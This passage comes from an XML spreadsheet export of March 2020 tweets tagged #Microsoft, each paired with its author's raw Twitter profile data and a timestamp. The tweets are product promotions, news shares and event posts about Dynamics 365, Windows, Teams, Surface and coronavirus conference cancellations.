    <t>Microsoft Dynamics 365 has introduced a Commerce program to all users. Read on to see what features will be added and how you can incorporate it to streamline management across all channels!
#Commerce #LoganConsulting #MSDyn365FO #MSDyn365 #Microsoft
https://t.co/6TmsRpD0gv</t>
  </si>
  <si>
    <t>{'id': 295897150, 'id_str': '295897150', 'name': 'Logan Consulting', 'screen_name': 'Loganconsulting', 'location': 'Chicago, IL', 'description': 'Logan Consulting helps companies use technology to reduce costs, increase sales, and increase profits.', 'url': 'https://t.co/mwT4uKE4dq', 'entities': {'url': {'urls': [{'url': 'https://t.co/mwT4uKE4dq', 'expanded_url': 'http://www.loganconsulting.com', 'display_url': 'loganconsulting.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 297, 'friends_count': 363, 'listed_count': 8, 'created_at': 'Mon May 09 21:07:09 +0000 2011', 'favourites_count': 80, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 582,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'http://pbs.twimg.com/profile_images/1143948843953860608/iwSbULT7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1143948843953860608/iwSbULT7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/295897150/1561574993',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</si>
  <si>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20:37:37 +0000 2020</t>
  </si>
  <si>
    <t>The problem with AI... #MicrosoftNews
There is nothing about this "craft" that is SAIL
#Microsoft https://t.co/53ix3u4YXD</t>
  </si>
  <si>
    <t>{'id': 15365551, 'id_str': '15365551', 'name': 'John Burns', 'screen_name': 'jbkazoo', 'location': 'Kalamazoo County, MI', 'description': 'Build applications/forms delivered via web w/SQL .:. VB .Net Instructor .:. Veggie Gardening .:. BSG/Caprica', 'url': 'http://t.co/YYiA8nnew9', 'entities': {'url': {'urls': [{'url': 'http://t.co/YYiA8nnew9', 'expanded_url': 'http://aviewoftheMarsh.us', 'display_url': 'aviewoftheMarsh.us', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 405, 'friends_count': 512, 'listed_count': 50, 'created_at': 'Wed Jul 09 13:51:12 +0000 2008', 'favourites_count': 5466, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 41663,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'http://pbs.twimg.com/profile_images/479465860889718784/I0ewg5C7_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/479465860889718784/I0ewg5C7_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/15365551/1403148441', 'profile_link_color': '4A913C',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</si>
  <si>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Mar 05 20:36:52 +0000 2020</t>
  </si>
  <si>
    <t>The book of my dreams
//
Throwback to when I got the chance to test the mighty #surfacebook
#microsoft #surface #sketching #madeonsurface #createdonsurface #drawing #designers #tool #ultimate #wishlist #leftie... https://t.co/L47dK9FrTQ</t>
  </si>
  <si>
    <t>{'id': 34558133, 'id_str': '34558133', 'name': 'Bendik Skilbrei', 'screen_name': 'bendik_s', 'location': 'Oslo', 'description': 'Father (son and identical twin girls), husband and industrial designer. Windows Phone enthusiast with a love for music, movies, photography, and Mother Nature.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 195, 'friends_count': 428, 'listed_count': 13, 'created_at': 'Thu Apr 23 07:06:42 +0000 2009', 'favourites_count': 3893, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3160, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1045815818322411520/jR8cuQaD_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1045815818322411520/jR8cuQaD_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/34558133/1411023020', 'profile_link_color': 'E61F05', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DAECF4', 'profile_text_color': '663B12', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 20:35:13 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft has officially announced #windows7 has ended #support. We recommend upgrading to #windows10 at the earliest, with no #windowsupdate your device could be left vulnerable. Enquire  today for more details on upgrading to #windows10 https://t.co/ZAHhWZ8yOZ</t>
  </si>
  <si>
    <t>{'id': 1156704339462905858, 'id_str': '1156704339462905858', 'name': 'itechbar', 'screen_name': 'itechbar1', 'location': '', 'description': 'Do you need #technicalsupport whether thatâ€™s #onsitesupport or maybe #remotesupport , our experienced Team are dedicated and driven by results!', 'url': 'https://t.co/wiDFOtuMwk', 'entities': {'url': {'urls': [{'url': 'https://t.co/wiDFOtuMwk', 'expanded_url': 'http://www.itechbar.co.uk/', 'display_url': 'itechbar.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 51, 'listed_count': 0, 'created_at': 'Wed Jul 31 23:12:59 +0000 2019',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'http://pbs.twimg.com/profile_images/1235664802493718529/j0pU6-DS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235664802493718529/j0pU6-DS_normal.jpg',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</si>
  <si>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20:33:14 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Exploring Tweaked Start Menu #Design in #Windows10 https://t.co/nq4AvTV6jV</t>
  </si>
  <si>
    <t>{'id': 52676679, 'id_str': '52676679', 'name': 'Alan Howshall', 'screen_name': 'DigitalAmoeba', 'location': 'Cardiff, UK', 'description': 'Senior Web &amp; UI designer working @BT_UK. Sometimes Podcaster. Avid fan of Tech, Gadgets, Photography, Architecture &amp; Space. Opinions all my own.', 'url': 'https://t.co/HHtUZCOorc', 'entities': {'url': {'urls': [{'url': 'https://t.co/HHtUZCOorc', 'expanded_url': 'http://about.me/alanhowshall', 'display_url': 'about.me/alanhowshall', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 774, 'friends_count': 752, 'listed_count': 261, 'created_at': 'Wed Jul 01 09:07:38 +0000 2009', 'favourites_count': 15010, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 21045,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'http://pbs.twimg.com/profile_images/460423184869629955/dPcXtTMb_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/460423184869629955/dPcXtTMb_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/52676679/1398676191', 'profile_link_color': '2C77B8',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</si>
  <si>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Thu Mar 05 20:31:49 +0000 2020</t>
  </si>
  <si>
    <t>#MonacoDigital speakers line up at #SecureITDay 2020! #DreamTeam #MonacoITfun #Proud #VeeamVanguard #NSE7 #Microsoft #Veeam #Fortinet #Varonis @MonacoDigital98 https://t.co/Qn90tITQIV</t>
  </si>
  <si>
    <t>{'id': 125994254, 'id_str': '125994254', 'name': 'Christopher GlÃ©mot', 'screen_name': 'c_glemot', 'location': '', 'description': '#DataProtection &amp; #Governance Team Lead | Owner of https://t.co/RTuP6xOP2g | #VeeamVanguard | #VaronisElite | #MonacoDigital | #aOSComm | Tweets are my own!', 'url': 'https://t.co/MWntU5Qczn', 'entities': {'url': {'urls': [{'url': 'https://t.co/MWntU5Qczn', 'expanded_url': 'http://www.original-network.com', 'display_url': 'original-network.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/RTuP6xOP2g', 'expanded_url': 'http://original-network.com', 'display_url': 'original-network.com', 'indices': [51, 74]}]}}, 'protected': False, 'followers_count': 824, 'friends_count': 2783, 'listed_count': 166, 'created_at': 'Wed Mar 24 14:18:19 +0000 2010', 'favourites_count': 4747, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4080,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'http://pbs.twimg.com/profile_images/1176239178541125633/70p_7JO2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176239178541125633/70p_7JO2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/125994254/1533122848',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</si>
  <si>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20:30:43 +0000 2020</t>
  </si>
  <si>
    <t>#AI #microsoft     Historians are using #MicrosoftAI to understand art, and by extension, ourselves, better than ever before. Learn how #TheMet and partners, @Microsoft and @MIT, are transforming the way we experience art. https://t.co/EVulny7fYA</t>
  </si>
  <si>
    <t>Thu Mar 05 20:30:00 +0000 2020</t>
  </si>
  <si>
    <t>We're rearchitecting everything at Microsoft now that we're fully in the #cloud. #transformation #Azure #Microsoft https://t.co/5P5UOylGk4</t>
  </si>
  <si>
    <t>Thu Mar 05 20:29:01 +0000 2020</t>
  </si>
  <si>
    <t>Google, Microsoft, and Cisco are making their full conferencing tools free because of the coronavirus #eduk8me #videoconferencing #microsoft #google #edtech #cisco https://t.co/t3bUO4IKY6</t>
  </si>
  <si>
    <t>{'id': 54220497, 'id_str': '54220497', 'name': 'Ryan Collins â“”', 'screen_name': 'eduk8me', 'location': 'Ohio', 'description': 'Teacher, learner, marathoner, and lover of the Oxford comma.\nFounder of Eduk8me LLC - https://t.co/lHuaXPr3kW\nWhat do you want to learn today? Teach like a hacker.  \n #edtech', 'url': 'https://t.co/eI8Sp93dUB', 'entities': {'url': {'urls': [{'url': 'https://t.co/eI8Sp93dUB', 'expanded_url': 'https://eduk8.me', 'display_url': 'eduk8.me', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/lHuaXPr3kW', 'expanded_url': 'http://eduk8.me', 'display_url': 'eduk8.me', 'indices': [86, 109]}]}}, 'protected': False, 'followers_count': 11839, 'friends_count': 6812, 'listed_count': 237, 'created_at': 'Mon Jul 06 14:36:31 +0000 2009', 'favourites_count': 175114, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 13899,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'http://pbs.twimg.com/profile_images/1148552832959811584/dibzweTO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1148552832959811584/dibzweTO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/54220497/1561289727', 'profile_link_color': '3B94D9',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</si>
  <si>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Google, Microsoft, and Cisco are making their full conferencing tools free because of the coronavirus #eduk8me #videoconferencing #microsoft #google #edtech #cisco https://t.co/VtfQ6MJCoh</t>
  </si>
  <si>
    <t>{'id': 8341772, 'id_str': '8341772', 'name': 'Ryan Collins', 'screen_name': 'mr_rcollins', 'location': 'Kenton, OH', 'description': 'Teacher and learner ðŸ‘¨\u200dðŸ« Director of Technology for Kenton City Schools ðŸ‘¨\u200dðŸ’» Founder of https://t.co/eI8Sp93dUB â“” https://t.co/vgpuz0pMtV', 'url': 'http://t.co/lZLSLtgIVP', 'entities': {'url': {'urls': [{'url': 'http://t.co/lZLSLtgIVP', 'expanded_url': 'http://ryancollins.org/', 'display_url': 'ryancollins.org', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/eI8Sp93dUB', 'expanded_url': 'https://eduk8.me', 'display_url': 'eduk8.me', 'indices': [86, 109]}, {'url': 'https://t.co/vgpuz0pMtV', 'expanded_url': 'https://keybase.io/mr_rcollins', 'display_url': 'keybase.io/mr_rcollins', 'indices': [112, 135]}]}}, 'protected': False, 'followers_count': 7761, 'friends_count': 6170, 'listed_count': 229, 'created_at': 'Tue Aug 21 22:43:41 +0000 2007', 'favourites_count': 70570, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17719,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'http://pbs.twimg.com/profile_images/1142756425376116738/FnDZZJax_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1142756425376116738/FnDZZJax_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/8341772/1561289166',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</si>
  <si>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20:28:23 +0000 2020</t>
  </si>
  <si>
    <t>I am a #microsoft #excel instructor at MassHire Metro North Career Center.   Come take a class with me and learn #Pivottables</t>
  </si>
  <si>
    <t>{'id': 171115858, 'id_str': '171115858', 'name': 'Jan Romano', 'screen_name': 'janromano_teach', 'location': 'Boston, MA', 'description': '#Instructor who will #teach you how to use #SocialMedia to build your brand and land that perfect job!', 'url': 'https://t.co/4ELd7f7Xfw', 'entities': {'url': {'urls': [{'url': 'https://t.co/4ELd7f7Xfw', 'expanded_url': 'http://www.linkedin.com/in/janromanosoftwareinstructor', 'display_url': 'linkedin.com/in/janromanosoâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 49, 'friends_count': 167, 'listed_count': 1, 'created_at': 'Mon Jul 26 16:02:25 +0000 2010', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 196,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'http://pbs.twimg.com/profile_images/1048188295610605568/uoMHm0KJ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1048188295610605568/uoMHm0KJ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/171115858/1451503273',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</si>
  <si>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20:27:30 +0000 2020</t>
  </si>
  <si>
    <t>Hey @stfxuniversity @StFXAUT ! 
Want to learn more about Microsoft Teams and how to meet virtually? Check out their training videos: https://t.co/0z7jbEy7T0 
#stfx #microsoft #technology #highereducation</t>
  </si>
  <si>
    <t>{'id': 608647494, 'id_str': '608647494', 'name': 'St. Francis Xavier IT Services', 'screen_name': 'stfxitservices', 'location': 'StFX - Antigonish, NS', 'description': 'STFX IT Services', 'url': 'https://t.co/ytteKEQxG3', 'entities': {'url': {'urls': [{'url': 'https://t.co/ytteKEQxG3', 'expanded_url': 'http://mystfx.ca/ithelp', 'display_url': 'mystfx.ca/ithelp', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 134, 'friends_count': 56, 'listed_count': 1, 'created_at': 'Thu Jun 14 22:46:57 +0000 2012', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 284,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'http://pbs.twimg.com/profile_images/1105855960202051584/bKPMVjVM_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105855960202051584/bKPMVjVM_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/608647494/1557834508',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</si>
  <si>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20:26:01 +0000 2020</t>
  </si>
  <si>
    <t>PowerShell provides two similar management interfaces for accessing data on a computer: WMI and CIM. Whats the difference between these management interfaces? Which one should you use, and why? #PowerShell #automation #microsoft
https://t.co/JksDYBTE7v https://t.co/jUm1YRUJ2z</t>
  </si>
  <si>
    <t>{'id': 792360012, 'id_str': '792360012', 'name': 'Mike Kanakos', 'screen_name': 'MikeKanakos', 'location': 'Apex, NC', 'description': 'Leader @RTPSUG | Techwriter: @4sysops, @ipswitch | Contributor: PowerShell Conf Book vol1&amp;2 |  https://t.co/NRhiGGuQg4 community director', 'url': 'https://t.co/ow5HsHl23x', 'entities': {'url': {'urls': [{'url': 'https://t.co/ow5HsHl23x', 'expanded_url': 'https://networkadm.in', 'display_url': 'networkadm.in', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/NRhiGGuQg4', 'expanded_url': 'http://Powershell.org', 'display_url': 'Powershell.org', 'indices': [95, 118]}]}}, 'protected': False, 'followers_count': 1249, 'friends_count': 452, 'listed_count': 36, 'created_at': 'Thu Aug 30 20:44:59 +0000 2012', 'favourites_count': 2176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2553,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'http://pbs.twimg.com/profile_images/982268270588788736/QJ7o7K0h_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982268270588788736/QJ7o7K0h_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/792360012/1572785374',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</si>
  <si>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20:20:23 +0000 2020</t>
  </si>
  <si>
    <t>Major flagship Conferences from companies like #Google #Facebook #Adobe #microsoft pulled off amidst the Coronavirus epidemic.
https://t.co/6l5J5ITmic https://t.co/pO0eZZ98MX</t>
  </si>
  <si>
    <t>{'id': 1231007720477560832, 'id_str': '1231007720477560832', 'name': 'App Investigate', 'screen_name': 'AppInvestigate', 'location': '', 'description': 'A place to get information &amp; review of Android and iOS applications', 'url': 'https://t.co/1U8eSr72vQ', 'entities': {'url': {'urls': [{'url': 'https://t.co/1U8eSr72vQ', 'expanded_url': 'http://appinvestigate.com/', 'display_url': 'appinvestigate.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 0, 'listed_count': 0, 'created_at': 'Sat Feb 22 00:08:37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'http://pbs.twimg.com/profile_images/1231009375633866752/8PrMGChI_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231009375633866752/8PrMGChI_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1231007720477560832/1582330547',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</si>
  <si>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20:19:01 +0000 2020</t>
  </si>
  <si>
    <t>"#Travel News: Coronavirus Cancellations: #Google, #Microsoft Among Firms Curbing Employee #Travel - NPR #News": https://t.co/n9hveRn3f1</t>
  </si>
  <si>
    <t>{'id': 40173650, 'id_str': '40173650', 'name': 'Global News Report', 'screen_name': 'robinsnewswire', 'location': "RT's Are FYI Purposes Only", 'description': 'Flying the web for trusted world news reports and shopping discounts 24/7. Retweeting for opinions, useful information, and the many voices of Twitter.', 'url': 'http://t.co/DNyCun08Ab', 'entities': {'url': {'urls': [{'url': 'http://t.co/DNyCun08Ab', 'expanded_url': 'http://www.robinspost.com', 'display_url': 'robinspost.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 25163, 'friends_count': 17719, 'listed_count': 4001, 'created_at': 'Fri May 15 04:16:20 +0000 2009', 'favourites_count': 553, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1567506, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '141106', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme3/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/748396533205327872/1I6ru8Ip_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/748396533205327872/1I6ru8Ip_normal.jpg', 'profile_link_color': '880000', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '634047', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 20:18:20 +0000 2020</t>
  </si>
  <si>
    <t>Coordinate care in real-time by enabling #healthcare teams to communicate and make decisions in a single secure place. Learn more:
https://t.co/ztoPgJImoS https://t.co/g5aZbJHjBY #Microsoft</t>
  </si>
  <si>
    <t>{'id': 3230382869, 'id_str': '3230382869', 'name': 'Adrien LainÃ©', 'screen_name': 'LaineAdrien', 'location': 'France', 'description': 'Account Executive at @MicrosoftFrance\n#StartupLover #Health #Esante\nDiscutons : https://t.co/h7Umh2SY5t', 'url': 'https://t.co/UIPwSG7Vjm', 'entities': {'url': {'urls': [{'url': 'https://t.co/UIPwSG7Vjm', 'expanded_url': 'https://www.linkedin.com/in/adrien-laine/', 'display_url': 'linkedin.com/in/adrien-lainâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/h7Umh2SY5t', 'expanded_url': 'http://linkedin.com/in/adrien-laine', 'display_url': 'linkedin.com/in/adrien-laine', 'indices': [80, 103]}]}}, 'protected': False, 'followers_count': 3137, 'friends_count': 4562, 'listed_count': 87, 'created_at': 'Sun May 03 12:09:30 +0000 2015', 'favourites_count': 4482, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8482,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'http://pbs.twimg.com/profile_images/1046382251309768704/g5H-aF8K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1046382251309768704/g5H-aF8K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3230382869/1480407137',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</si>
  <si>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20:18:06 +0000 2020</t>
  </si>
  <si>
    <t>Windows Camera with new icon in #Windows10 version 1909. Details: https://t.co/3jhJWsgEE4 #Microsoft https://t.co/uhXPaq74De</t>
  </si>
  <si>
    <t>{'id': 2324211697, 'id_str': '2324211697', 'name': 'HTNovo', 'screen_name': 'HTNOVO', 'location': 'Roma, Lazio', 'description': 'Solo il nuovo del mondo Hi-Tech! - CEO &amp; Founder: Jo Val | Consultant @Microsoft - Windows Insider MVP - #Microsoft Community Moderator and Article Author', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 632, 'friends_count': 201, 'listed_count': 91, 'created_at': 'Sun Feb 02 19:29:52 +0000 2014', 'favourites_count': 2034, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 8498, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3B94D9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1032566875350360064/tzJMv3S4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1032566875350360064/tzJMv3S4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2324211697/1534967703', 'profile_link_color': '0D8ABC',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</si>
  <si>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Mar 05 20:15:07 +0000 2020</t>
  </si>
  <si>
    <t>It is great to see Microsoft Teams release a constant flow of improvements!
#Teams #Microsoft #Collaboration #MSFT
https://t.co/XkEnfPgIhn</t>
  </si>
  <si>
    <t>Thu Mar 05 20:15:03 +0000 2020</t>
  </si>
  <si>
    <t>Save BIG on select @Microsoft Surface products https://t.co/zrhRpdKTE3 #Microsoft #surfacepro https://t.co/2z2yGQ7Nsq</t>
  </si>
  <si>
    <t>{'id': 44285939, 'id_str': '44285939', 'name': 'BuyDig.com', 'screen_name': 'BUYDIG', 'location': 'USA', 'description': "Looking for great deals on top products? We've got you covered! BuyDig Knows Deals and we're sharing ours so you can SAVE BIG!", 'url': 'https://t.co/kJ6rT5Iodz', 'entities': {'url': {'urls': [{'url': 'https://t.co/kJ6rT5Iodz', 'expanded_url': 'http://buydig.com', 'display_url': 'buydig.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 11662, 'friends_count': 7109, 'listed_count': 197, 'created_at': 'Wed Jun 03 03:52:34 +0000 2009', 'favourites_count': 964, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18908, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'D9EEFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/925838581876346880/mtCm9b6A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925838581876346880/mtCm9b6A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44285939/1583356610', 'profile_link_color': '005B9A', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'B5D4F1', 'profile_text_color': '000000', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 20:13:02 +0000 2020</t>
  </si>
  <si>
    <t>.@pbrody , leader of @EYnews launches new platform for enterprises on the Ethereum blockchain, in partnership with @Microsoft and @Consensys  https://t.co/RJ5gDQVvMB 
via @Cointelegraph 
#Ey #Microsoft #ConsenSys #Ethereum #ETH $ETH #Blockchain #BlockchainNews #DeFi https://t.co/C40sDm5vQK</t>
  </si>
  <si>
    <t>{'id': 1035501891189460993, 'id_str': '1035501891189460993', 'name': 'Qooiver', 'screen_name': 'qooiver', 'location': 'Geneva, Switzerland', 'description': '#Qooiver is a #socialnetwork based on your #interests, where you can find only what you want. It has a built-in news agregator that pulls your desired content.', 'url': 'https://t.co/7mbCKY6oHK', 'entities': {'url': {'urls': [{'url': 'https://t.co/7mbCKY6oHK', 'expanded_url': 'https://qooiver.com/', 'display_url': 'qooiver.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 515, 'friends_count': 0, 'listed_count': 1, 'created_at': 'Fri Aug 31 12:17:44 +0000 2018', 'favourites_count': 1556, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 786, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1035502842960900097/fWg72dB5_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1035502842960900097/fWg72dB5_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1035501891189460993/1560346207',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</si>
  <si>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20:11:16 +0000 2020</t>
  </si>
  <si>
    <t>Someone provide me a nice huge gigantic bed
https://t.co/W5CAIC3Rem
#Virginia Beach
 #microsoft #wine https://t.co/P6zivqkDIG</t>
  </si>
  <si>
    <t>{'id': 1230040804619673601, 'id_str': '1230040804619673601', 'name': 'Dawn7100', 'screen_name': 'Dawn71001', 'location': 'Hartford, USA', 'description': 'Heâ€™s more myself than I am. Whatever our souls are made of, his and mine are the same', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 6, 'friends_count': 30, 'listed_count': 0, 'created_at': 'Wed Feb 19 08:06:01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'http://pbs.twimg.com/profile_images/1230059941723082752/IpAVAw5W_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230059941723082752/IpAVAw5W_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1230040804619673601/1582104151',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</si>
  <si>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20:10:34 +0000 2020</t>
  </si>
  <si>
    <t>Advancing Azure Active Directory availability https://t.co/Z1UVMWcVLY
#Azure #Microsoft #MSPartner</t>
  </si>
  <si>
    <t>{'id': 39603093, 'id_str': '39603093', 'name': 'Technology Management Concepts (TMC)', 'screen_name': 'TMCDynamicsERP', 'location': 'El Segundo, CA', 'description': 'We are a Microsoft Gold-Certified partner based in Los Angeles, CA. \nWe offer expertise in #Microsoft #ERP products such as: Dynamics 365, BC, GP, CRM, Azure...', 'url': 'https://t.co/bMUvLKBeV9', 'entities': {'url': {'urls': [{'url': 'https://t.co/bMUvLKBeV9', 'expanded_url': 'https://abouttmc.com/', 'display_url': 'abouttmc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3465, 'friends_count': 4566, 'listed_count': 171, 'created_at': 'Tue May 12 21:38:44 +0000 2009', 'favourites_count': 627, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6920,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'http://pbs.twimg.com/profile_images/1016981128417300480/ZXRXqJYC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1016981128417300480/ZXRXqJYC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39603093/1531301839',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</si>
  <si>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20:08:42 +0000 2020</t>
  </si>
  <si>
    <t>And to crown it all the day ended with a happy hour session at one of local restaurants where Microsoft Student Partners had an interactive session with #MicrosoftADC Engineers  over dinner.
#MicrosoftLife #Microsoft #MSFTStudentPartner @IamPablo https://t.co/r4HKaIXW3g</t>
  </si>
  <si>
    <t>{'id': 878542469046177792, 'id_str': '878542469046177792', 'name': 'Josh - #ImagineCupðŸ† #MSPTourKE', 'screen_name': 'Jcardif254', 'location': 'Nyeri, Kenya', 'description': 'Self taught .Net Dev|Electrical Engineer|AI &amp; IoT Evangelist |Microsoft Student partner | All things @Azure', 'url': 'https://t.co/D0gWMnRdv8', 'entities': {'url': {'urls': [{'url': 'https://t.co/D0gWMnRdv8', 'expanded_url': 'http://standwak.com', 'display_url': 'standwak.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 339, 'friends_count': 226, 'listed_count': 1, 'created_at': 'Sat Jun 24 09:17:01 +0000 2017', 'favourites_count': 995, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 620, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1093739630841810945/YnyDGp0i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1093739630841810945/YnyDGp0i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/878542469046177792/1549602950',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</si>
  <si>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20:08:41 +0000 2020</t>
  </si>
  <si>
    <t>The amazing of all The Global program Manager for The Microsoft student Partner Program Pablo Veramendi- @IamPablo joined us remotely and gave one of the most inspiring talks. Thanks @IamPablo 
